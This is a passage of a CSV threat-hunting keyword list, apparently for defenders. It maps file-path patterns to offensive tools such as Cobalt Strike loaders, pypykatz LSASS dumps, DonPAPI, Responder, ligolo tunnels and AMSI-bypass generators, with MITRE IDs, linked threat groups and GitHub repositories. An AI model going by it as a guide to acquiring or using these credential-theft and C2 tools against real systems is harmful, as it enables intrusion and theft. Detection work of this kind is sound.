Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/lgandx/Responder*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z"
+"*/lib/GHunt/*","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","9","800","93","2023-08-12T21:59:23Z","2020-04-07T22:25:38Z"
+"*/lib/ipLookupHelper.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z"
+"*/lib/msf/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/libgobuster*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z"
+"*/liboffsetfinder64*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/LibSnaffle*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","1","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z"
+"*/LightsOut.git*","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/icyguider/LightsOut","1","1","N/A","N/A","3","243","29","2023-06-09T10:39:36Z","2023-06-01T14:57:44Z"
+"*/ligolo.git*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z"
+"*/ligolo-ng*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z"
+"*/LinEnum.git*","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation 
Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","N/A","10","6219","1947","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z"
+"*/LinEnum/*","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","N/A","10","6219","1947","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z"
+"*/linpeas.sh*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*/linpeas.sh*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z"
+"*/linux_ldso_dynamic.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*/linux_ldso_hwcap.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege 
escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*/linux_ldso_hwcap_64.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*/linux_offset2lib.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*/linux-smart-enumeration.git*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z"
+"*/linWinPwn*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*/llmnr-resolve.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/lltd-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/load-assembly.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z"
+"*/LoadDllRemote.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z"
+"*/loader/bypass.c","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"*/loader/bypass.h","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"*/loader/x64/Release/loader.exe*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z"
+"*/loadercrypt_*.php*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z"
+"*/local-exploits/master/CVE*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*/LocalPotato.git*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z"
+"*/LocalPrivEsc/*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*/localroot/2.6.x/elflbl*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*/localroot/2.6.x/h00lyshit*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*/Locksmith.git*","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","8","5","473","38","2023-10-02T02:29:08Z","2022-04-28T01:37:32Z"
+"*/log4shell.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation 
tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*/login_scanner*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/login-securite/DonPAPI*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*/logs/*/becon_*.log","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","10","10","149","40","2021-03-29T07:00:00Z","2019-02-22T09:36:44Z" +"*/logs/beacon_log*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/lookupsid.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/loot_default/*.exe*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*/loot_default/*.ps1*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*/loot_default/*.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*/loot_finder*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/lpBunny/bof-registry*","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" +"*/lsa_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 
- TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/lsass.DMP*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*/lsass/beacon.h*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" +"*/LSASSProtectionBypass/CredGuard.c*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense 
